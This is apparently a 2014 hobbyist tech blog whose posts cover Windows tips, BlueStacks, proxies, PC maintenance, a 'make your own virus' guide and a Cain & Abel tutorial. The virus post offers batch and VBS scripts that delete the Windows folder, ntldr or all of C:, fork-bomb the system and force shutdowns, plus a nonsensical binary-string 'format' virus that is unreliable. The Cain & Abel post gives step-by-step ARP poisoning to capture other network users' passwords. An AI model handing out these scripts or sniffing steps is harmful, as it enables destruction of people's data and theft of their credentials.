Tuesday, 18 March 2014

WINDOWS 7 GOD MODE

Our Windows 7 has a very exciting and useful feature of GOD Mode .
It is one of the various hidden features of windows 7 .
Basically GOD Mode is just a name, in real its a shortcut for various of administrative, display, configuration etc settings and modes .

You can think it of as a common place for representing almost every configurable option available in windows 7 . Now you don't have to open control panel every time .

Enabling the god mode is very easy , 

  1. GO TO YOUR DESKTOP
  2. RIGHT CLICK AND SELECT NEW
  3. SELECT NEW FOLDER
  1. RENAME IT  
  2. COPY AND PASTE THE FOLLOWING CODE IN THE NAME PLACE OF FOLDER:   GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}  .
  3. COPY N PASTE AS IT IS , CLICK ENTER OR OKAY.
    DAT'S IT, GOD MODE IS NOW ENABLED .


Hope you enjoyed it.
share the post,
for any doubts or else , please comment below .

HOW TO USE ANROID APPS ON LAPTOP

Think if you are able to play Temple run or other games or use WATSAPP on your computer .. Fun isn't ?

Recently a friend of mine faced a problem , her smartphone stopped working due to some technical failure, in result she is no longer be able to use Watsapp and other android apps .
If you are also facing this kind of prob, and want to use those android apps on your computer/laptop meanwhile you fond another phone, then yes WE HAVE THE SOLUTION .

You may have heard of the name of the software ," BLUESTACKS" .
Bluestacks is a software to be installed in windows environment or in MAC OS . What it does is , it enables the users to use almost all their Android applications on their  laptops of computers as they were using it in their smartphones .
It is very easy to use and comes handy in various situations .

So, let us begin with the downloading and installation first . It is freely available , i am providing you the official link for downloading : Download here 

After the download is finished , install  the software , here i am assuming that you know how to install the software as you might have done previously , so follow the same procedure .

after the installation is finished , you can follow the simple instructions and search for the specific application you want to install .
Choose the application , it will be downloaded and installed.
Now you can work and use most of your android apps in your computer or laptop .

kindly share the post and comment for any doubts or any other .

Monday, 17 March 2014

MAKE YOUR OWN VIRUS  


ON A SPECIAL DEMAND FROM A  FRIEND OF MINE :

Ever wanted to make your own virus ? Even  tried ? Didn't succeed ?... Don't be sad now ill help you to create your own virus .
Wikipedia and many other text  books define Virus as a piece of code capable of copying itself and has various effects such as corrupting a file or destroying a data .
Interesting na ?
Lets begin .
Here i will teach you how to make some funny viruses and some serious ones. Try them and try them with a little modification of your also .

WARNING: Improper usage of some of these viruses can result of fatal results , the results can also vary in comparison of the desired result , so use caution. The author shall not be liable for any loss of data or else .

FUNNY VIRUSES :

1. FORCEFUL SHUTDOWN

TO FORCEFULLY SHUTDOWN THE SYSTEM WITH A TAUNTING MSG
TYPE EXACTLY AS WRITTEN WITHING THE SQUARE BRACKETS, DO NOT COPY OR TYPE THE SQUARE BRACKETS::

OPEN NOTEPAD TYPE IN THE FOLLOWING CODE


[@echo off
msg * I don't like you
shutdown -c Error! You are too stupid! -s]

SAVE THE FILE AS "msg.bat" (without quotes ) and dont forget to change the type of save as all files.
when saved run the file by double clicking it .
THIS WILL DISPALY A MESSAGE " I DONT LIKE YOU" AND THEN IT WILL SHUTDOWN THE SYSTEM

2. TO MAKE THOUSAND OF FOLDERS WITHIN SECONDS
 FOR   XP


TO MAKE  MULTIPLE FOLDERS OMN DESKTOP OR WHERE THE FILE IS SAVED, IT WILL MAKE THOUSANDS OF FOLDERS... ENJOY , U HAVE TO DELETE THE FOLDERS MANUALLY.

CODE---

[@echo off
:hello 
md %random%
goto hello]
save this code without square brackets

SAVE AS "folder.bat" (without quotes) 

3. MATRIX FALLING EFFECT

[@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks]

Save the file as "matrix.bat" (without quotes )

4. CONSTANTLY MAKE YOUR CD WRITER COME OUT AND IN


Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop ]

Save the file as "cd.vbs" (without quotes )

5.MAKE YOUR COMPUTER TALK TO YOU

 Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.

To create one such talk script, follow the steps given below:-


[  Dim Message, Speak
          Message=InputBox("Enter text","Speak")
          Set Speak=CreateObject("sapi.spvoice")
          Speak.Speak Message ]

SAVE THIS FILE AS "msg.vbs"( WITHOUT QUOTES )  JUST RUN THE FILE , A POP UP WILL APPEAR TYPE IN WATEVER YOU WANT TO HEAR AND PRESS OK.. ENJOY

6. HAVE YOUR COMPUTER WELCOME YOU

HAVE YOU EVER WANTED THAT WHENEVER YOU START YOUR COMPUTER YOUR COMPUTER SHOULD WELCOME YOU ? IF YES , THEN GO AHEAD COPY PSTE THE CODE AND HAVE FUN WITH IT .

.) THIS CODE REQ SOME ADDITIONAL STEPS
.) OPEN THE NOTEPAD, COPY PASTE THE FOLLOWING CODE WITHOUT SQUARE BRACKET

Dim speaks, speech
speaks="Welcome to your PC, Username"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks]

.) Replace Username with your own name. (no need to do it bold ,it is for presentation only)
.) Click on File Menu, Save As, select All Types in Save as Type option, and save the file as "Welcome.vbs" (WITHOUT QUOTES).
.) Copy the saved file. 
.) Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup (in Windows XP) and to C:\Users\ {User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup (in Windows 8, Windows 7 and Windows Vista) if C: is your System drive. AppData is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
.) Paste the file.

7. MAKE YOUR KEYBOARD LIGHTS GO DISCO

Keyboards usually have small LEDs which indicate whether different types of locks are activated or not. Here is a trick to use the lights of your keyboard in a more creative manner in Windows.

This trick uses a simple Visual Basic Script which when activated makes your Scroll lock, Caps lock and Num lock LEDs flash in a cool rhythmic way which gives the perception of a live disco on your keyboard.

COPY N PASTE THE FOLLOWING CODE WITHOUT SQUARE BRACKETS

[Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop]

SAVE THE FILE AS "disco.vbs" (without quotes) Enjoy...

........................................................................

NOW WE WILL SEE SOME SERIOUS VIRUSES  :P

1. TO FORMAT HARD DISK WITHIN SECONDS
COPY N PASTE THE FOLLOWING  CODE:

[ 01001011000111110010010101010101010000011111100000 ]
SAVE IT as for.exe

2. TO DELETE ENTIRE C DRIVE

COPY N PASTE THE FOLLOWING CODE

@Echo off
Del C:\ *.* |y ]

SAVE THE FILE AS "FOR.BAT"( WITHOUT QUOTES)

3. TO IMMEDIATELY CRASH THE WINDOWS




This will immideatly crash the system and winds wont run again.


CODE---

FOR WIN XP

@echo off
cd\
c:
attrib ntldr -s -h -r
del ntldr /f

SAVE IT AS " CRASH.BAT" (WITHOUT QUOTES)

FOR WIN7-

[
rmdir c:\windows /q /s
]
SAVE IT AS "CRASH.BAT" (WITHOUT QUOTES) 

4. MAKE SYSTEM GO TO PERMANENT HANG

This will increase ram usage and page file index usage , and system will go on permanent hang !!!!!!!


CODE---

[
%0|%0
]

SAVE THE FILE AS "RM.BAT" (WITHOUT QUOTES)

I HOPE YOU WILL BE ABLE TO LEARN SOMETHING AND ENJOY FROM THE ABOVE GIVEN CODES.

IF YOU LIKE THE WORK OF AUTHOR KINDLY SHARE IT WITH YOUR FRIENDS AND COMMENT BELOW.

FOR ANY DOUBTS KINDLY COMMENT .

Sunday, 16 March 2014

HOW TO SEE THE LIST OF LOGIN AND LOGOUT EVENTS IN WINDOWS

Have you ever wanted to check if anyone has logged in to your computer in your absence ?
Well now you have the option to check ( the option was previously available , but you get to know about it now  :p  
1. Click on start -> run ( or simply press windows button + r ) .
2. Type eventvwr.msc
3. Here you will see a new window will pop up.
4. From the available option in the left select and choose windows logs  and then security .
5. In the middle of the window you will see a list with Date and Time, Source, Event ID, and Task Category columns. The Task Category pretty much explains the event: Logon, Special Logon, Logoff, and other details .



The events will be called Audit Success .The category will be logon.
There will be many logs available , this is normal . But we will look for logons with ID - 4624 that is successful logons.


Under the General Tab in the area below the list, look for NEW ID, and ignore “SYSTEM”.
basically the normal logins will look somehow like this:

If you find the id to be different than it means either it is virus or someone has forcefully logged in to your system .

For any doubts or suggestions please comment below.
Kindly share the post with your friends .

HOW TO MAINTAIN THE COMPUTER

Laptops or Computers are not free nor are inexpensive, therefore it requires to take care of them so as to maintain them and to extend there life.
There are just a simple ways to extend your laptops life :-

 1.      Don’t turn your computer on and off unnecessarily. 
Some people feel the need to power down several times a day. You don’t have to go weeks without turning off your computer, but frequent heating and cooling cycles can shorten component life. The key here is balance.  Don’t restart too much and don’t leave on too long either.  I turn my off every other day or so the computer can load updates and fix file errors correctly.

2.      Blow out the fan vents regularly.
 A lot of air moves through those vents, and dust tends to build up over time. Keep the internal components cool is imperative to extending the life of your computer. Ideally, the dust shouldn’t be blown back into the computer. Taking it apart is the best method. If you’re not comfortable doing this, seek out a qualified computer repair specialist.

3.      Use laptops on a hard service.
 Using your computer on a firm surface will keep the air vents unobstructed. Using a laptop on your lap or on a pillow would be a poor choice. Your lap generates heat and is soft. A pillow is soft and highly insulative. A firm table, out of the sun, is the best bet.

4.      Use a surge protector.
 Many CPU problems can be possibly avoided with the use of an inexpensive surge protector. Unplugging during a storm or power outage is the best practice, but if that’s not possible, a surge protector can help.

 5.      Get a regular tune up
Taking your computer into a qualified computer repair specialist is a great way to increase the longevity of your computer. They have the specialized software tools and experience to find potential problems quickly and easily. You probably take your car in for a tune-up on a regular basis. Your computer would be well-served by the same.

6.      Avoid eating and drinking while using your computer
Getting food or water down into your system can create all kinds of potential problems. Water and electronics never mix well. At the very least, blow out your keyboard with a can of compressed air regularly. 

7.      Use in a cool environment.
 Computer components hate heat. If possible, use your computer in a cool place. A 95-degree summer day isn’t the time to be using your laptop outdoors. The cooler, the better. 

8.      Use a good anti-malware program and keep it updated.
 Malware can cause all types of problems. With a quality anti-malware program, you’ll be able to keep a lot of potential issues at bay. Staying updated is important. There are thousands of malware programs released each day. 

With a few simple actions, you can be assured of getting the maximum amount of utility from it before needing a replacement. 

Wednesday, 12 March 2014

                                      PROXY

Proxy means an authority to represent someone else . It can be a Machine, Server or someone else.
In Computer Networks Proxy means  A server that acts as an intermediary for requests from clients a seeking resources from other servers.
A proxy or proxy server is basically another computer which serves as a hub through which internet requests are processed. By connecting through one of these servers, your computer sends your requests to the proxy server which then processes your request and returns what you were wanting. In this way it serves as an intermediary between your home machine and the rest of the computers on the internet.

Image for better understanding :
Proxy server Example

Proxies are used for a number of reasons such as to filter web content, to go around restrictions such as parental blocks, to screen downloads and uploads and to provide anonymity when surfing the internet.
In a daily and more common language Proxy servers are used to maintain the anonymity on Internet .
There are different ways to use proxy servers, They can be paid or free .
There are 4 classifications of Proxy Servers .
  • Transparent Proxy

    This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the HTTP headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.)
  • Anonymous Proxy

    This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users.
  • Distorting Proxy

    This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers.
  • High Anonymity Proxy

    This type of proxy server does not identify itself as a proxy server and does not make available the original IP address.
There are several Websites who offers these type of proxies , some do it for free , others may charge for it . 
Some of the web proxy websites available are :

Also you can search " proxy servers: on Google and you will get list of proxy's available .
  1. http://youtubefreeproxy.net
  2. http://ecxs.asia
  3. http://cantblockthis.org
  4. http://viewyoutube.net
  5. http://unblocksocialmedia.com
  6. hidemyass.com
HOW TO USE THE AVAILABLE PROXY LISTS ?
Well we have different web browsers, so steps are different for each of them , but for the most common web browsers the steps are :

Internet Explorer Proxy Settings

  • Click Tools
  • Click Internet Options
  • Click the Connections Tab
  • Click LAN settings
  • Check the “Use a proxy server for your LAN” box
  • Enter the IP Address of the Proxy Server and the Port Number
  • Click OK

FireFox Proxy Settings

  • Click the FireFox Button(The button in the upper left corner)
  • Click Options
  • Click Options in the new tab
  • Click the Advanced Tab
  • Click Settings
  • Click Manual Proxy Settings
  • In the HTTP Proxy Box enter the IP Address of the proxy server and the Port number
  • Click OK

Google Chrome Proxy Settings

  • Click the Customize and Control Button(Button with the wrench picture in upper right corner
  • Click Under the Hood
  • Click Change proxy settings
  • Click LAN Settings
  • Check the “Use a proxy server for your LAN” box
  • Enter the IP Address of the Proxy Server and the Port Number
  • Click OK

Safari Proxy Settings

  • Click Safari
  • Click Preferences
  • Click Advanced
  • Click Change Settings
  • Check the Web Proxy(HTTP) box
  • Enter the IP Address of the Proxy Server and the Port Number
  • Click Apply Now
 This is how we can use proxy servers to hide our real ip address .
Enjoy proxing  :)
Disclaimer : Use of the proxy's does not guarantee the total anonymity , use it at your own risk . the author is strictly against any illegal activity .
If you like the post kindly comment and share with your friends .

Sunday, 9 March 2014

      HOW TO USE CAIN & ABEL

Cain and Abel is a Network sniffing tool or you can call it a password recovery tool which is used by many penetration testers or security professionals working on Windows Platform .
It is used to perform variety of functions such as Sniffing passwords in a network , revealing password boxes, recovering wireless network keys or decoding the encrypted passwords. This tool uses Dictionary or Brute Force method to crack passwords.
The popularity of the software was reduced when another tool for the same purpose was launched by the name 'Wireshark' , which serves the same purpose , but still many professionals do use this Cain & Abel for different purposes .

Today we are going to see that how with the help of Cain & Abel we can sniff the http passwords and also , we will monitor the activities of someone on the internet .

For this first of all we have to download the software
The link for the official download page is :   Cain & Abel ( http://www.oxid.it/cain.html )

We are using this software to check the security level of our network

DISCLAIMER :  ALL THE STEPS SHOWN HERE ARE FOR EDUCATIONAL PURPOSES ONLY , THE AUTHOR DO NOT SUPPORT THE ILLEGAL ACTIVITIES NOR SHALL BE RESPONSIBLE FOR ANY ACTIVITY CAUSED DUE TO THIS SOFTWARE .  USE THIS SOFTWARE ON YOUR OWN RISK, PEEPING INTO THE PRIVATE LIFE OF OTHER IS A CRIMINAL OFFENCE .
After you have finished downloading run the software and follow the steps .

Step 1:
Check your ip address, to check 
Click on start , click on run 
Type cmd, click ok/enter
In CMD type ," ipconfig" (without quotes)
you will see your ip address
IMG 1

Step 2:
Run the software 

Click on the network tab and select Entire network
Then in the Menu bar click on Configure and from the list of available interfaces select that interface which contains the ip you saw through ipconfig command in cmd
Click on apply and ok

STEP 3:
Below the Menu bar click on the 2nd button from left which seems like a green chip, it says START/STOP Sniffer :
After clicking on that button you will now click on  the blue + sign to the right of the sniffer button
 A pop up will appear click on ok

STEP 4:
Now go to the bottom menu and click on ARP tab
After clicking on the ARP tab now click on the empty white space , and then again click on the BLUE + SIGN.
after clicking on it , a Pop up will appear with various IP Addresses on it , select the router's ip address , most commonly having   .1 in the last.
Select all the ips on the right side and click on ok
STEP 5:
now in the first box a list of ip address will appear , select all the Ip Addresses and click on the yellow circle button just below the Menu Bar.
STEP 6: 
As soon as you click on that yellow button , the second white box will start to have some activity , statements like full routing, half routing will tend to appear , if that happens , that means it is going good, if not then plz try again from the start .

STEP 7:
Now click on the Password tab located to the right of ARP tab in the bottom menu .
Now you will see all the web addresses visited by the clients coonected to your network, and the USERNAME AND PASSWORD used by them on different websites .

That is  how you can sniff the passwords and monitor the websites being visited by the people connected through your network .

For any questions or doubts kindly leave a comment below :)